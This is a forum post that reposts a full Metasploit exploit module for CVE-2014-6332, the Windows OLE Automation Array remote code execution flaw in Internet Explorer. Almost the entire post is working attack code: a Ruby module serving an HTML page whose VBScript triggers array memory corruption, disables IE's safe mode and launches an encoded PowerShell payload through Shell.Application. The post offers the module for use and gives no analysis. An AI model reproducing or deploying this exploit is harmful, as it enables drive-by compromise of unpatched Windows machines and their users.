Jump to content
akkiliON

Internet Explorer OLE Automation Array Remote Code Execution (msf)

Recommended Posts

  • Active Members
Posted


##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/exploit/powershell'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Powershell

def initialize(info={})
super(update_info(info,
'Name' => "Windows OLE Automation Array Remote Code Execution",
'Description' => %q{
This modules exploits the Windows OLE Automation Array Remote Code Execution Vulnerability.
Internet MS-14-064, CVE-2014-6332. The vulnerability exists in Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.
},
'License' => MSF_LICENSE,
'Author' =>
[
'IBM', # Discovery
'yuange <twitter.com/yuange75>', # PoC
'Rik van Duijn <twitter.com/rikvduijn>', #Metasploit
'Wesley Neelen <security[at]forsec.nl>' #Metasploit
],
'References' =>
[
[ 'CVE', '2014-6332' ]
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'EXITFUNC' => "none"
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ]
],
'Privileged' => false,
'DisclosureDate' => "November 12 2014",
'DefaultTarget' => 0))
end

def on_request_uri(cli, request)
payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
payl.slice! "powershell.exe "

html = <<-EOS
<!doctype html>

<html>

<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >

<head>

</head>

<body>


<SCRIPT LANGUAGE="VBScript">


function trigger()

On Error Resume Next

set shell=createobject("Shell.Application")

shell.ShellExecute "powershell.exe", "#{payl}", "", "open", 1

end function


</script>


<SCRIPT LANGUAGE="VBScript">



dim aa()

dim ab()

dim a0

dim a1

dim a2

dim a3

dim win9x

dim intVersion

dim rnda

dim funclass

dim myarray


Begin()


function Begin()

On Error Resume Next

info=Navigator.UserAgent


if(instr(info,"Win64")>0) then

exit function

end if


if (instr(info,"MSIE")>0) then

intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))

else

exit function



end if


win9x=0


BeginInit()

If Create()=True Then

myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)

myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)


if(intVersion<4) then

document.write("<br> IE")

document.write(intVersion)

runshellcode()

else

setnotsafemode()

end if

end if

end function


function BeginInit()

Randomize()

redim aa(5)

redim ab(5)

a0=13+17*rnd(6)

a3=7+3*rnd(5)

end function


function Create()

On Error Resume Next

dim i

Create=False

For i = 0 To 400

If Over()=True Then

' document.write(i)

Create=True

Exit For

End If

Next

end function


sub testaa()

end sub


function mydata()

On Error Resume Next

i=testaa

i=null

redim Preserve aa(a2)



ab(0)=0

aa(a1)=i

ab(0)=6.36598737437801E-314


aa(a1+2)=myarray

ab(2)=1.74088534731324E-310

mydata=aa(a1)

redim Preserve aa(a0)

end function



function setnotsafemode()

On Error Resume Next

i=mydata()

i=readmemo(i+8)

i=readmemo(i+16)

j=readmemo(i+&h134)

for k=0 to &h60 step 4

j=readmemo(i+&h120+k)

if(j=14) then

j=0

redim Preserve aa(a2)

aa(a1+2)(i+&h11c+k)=ab(4)

redim Preserve aa(a0)


j=0

j=readmemo(i+&h120+k)



Exit for

end if


next

ab(2)=1.69759663316747E-313

trigger()

end function


function Over()

On Error Resume Next

dim type1,type2,type3

Over=False

a0=a0+a3

a1=a0+2

a2=a0+&h8000000



redim Preserve aa(a0)

redim ab(a0)



redim Preserve aa(a2)



type1=1

ab(0)=1.123456789012345678901234567890

aa(a0)=10



If(IsObject(aa(a1-1)) = False) Then

if(intVersion<4) then

mem=cint(a0+1)*16

j=vartype(aa(a1-1))

if((j=mem+4) or (j*8=mem+8)) then

if(vartype(aa(a1-1))<>0) Then

If(IsObject(aa(a1)) = False ) Then

type1=VarType(aa(a1))

end if

end if

else

redim Preserve aa(a0)

exit function


end if

else

if(vartype(aa(a1-1))<>0) Then

If(IsObject(aa(a1)) = False ) Then

type1=VarType(aa(a1))

end if

end if

end if

end if





If(type1=&h2f66) Then

Over=True

End If

If(type1=&hB9AD) Then

Over=True

win9x=1

End If


redim Preserve aa(a0)



end function


function ReadMemo(add)

On Error Resume Next

redim Preserve aa(a2)



ab(0)=0

aa(a1)=add+4

ab(0)=1.69759663316747E-313

ReadMemo=lenb(aa(a1))



ab(0)=0



redim Preserve aa(a0)

end function


</script>


</body>

</html>
EOS

print_status("Sending html")
send_response(cli, html, {'Content-Type'=>'text/html'})

end

end

Surs?: Internet Explorer OLE Automation Array Remote Code Execution (msf)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...